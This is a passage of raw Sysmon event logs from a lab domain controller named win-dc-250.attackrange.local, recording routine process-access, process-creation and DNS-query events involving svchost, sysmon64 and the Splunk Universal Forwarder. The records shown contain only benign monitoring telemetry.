dll.dll+51791 10341000x80000000000000004669Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:16.413{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004668Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:16.413{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004667Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:16.413{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004666Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:16.413{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004665Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:16.413{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004710Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:17.898{08A6967A-43E5-6000-0701-000000009A01}32803368C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004709Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:17.742{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-43E5-6000-0701-000000009A01}3280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004708Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:17.742{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004707Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:17.742{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004706Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:17.742{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004705Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:17.742{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004704Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:17.742{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004703Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:17.742{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004702Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:17.742{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004701Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:17.742{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004700Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:17.742{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004699Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:17.742{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-43E5-6000-0701-000000009A01}3280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004698Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:17.742{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-43E5-6000-0701-000000009A01}3280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004697Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:17.743{08A6967A-43E5-6000-0701-000000009A01}3280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000004726Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:16.077{08A6967A-4288-6000-1200-000000009A01}1232win-dc-250.attackrange.local0fe80::1c24:42de:efae:dae3;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000004725Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:15.968{08A6967A-4288-6000-1000-000000009A01}1136win-dc-250.attackrange.local0fe80::1c24:42de:efae:dae3;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 10341000x80000000000000004724Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:18.523{08A6967A-43E6-6000-0801-000000009A01}45924600C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004723Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:18.367{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-43E6-6000-0801-000000009A01}4592C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004722Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:18.367{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004721Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:18.367{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004720Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:18.367{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004719Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:18.367{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004718Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:15:18.367{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004717Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 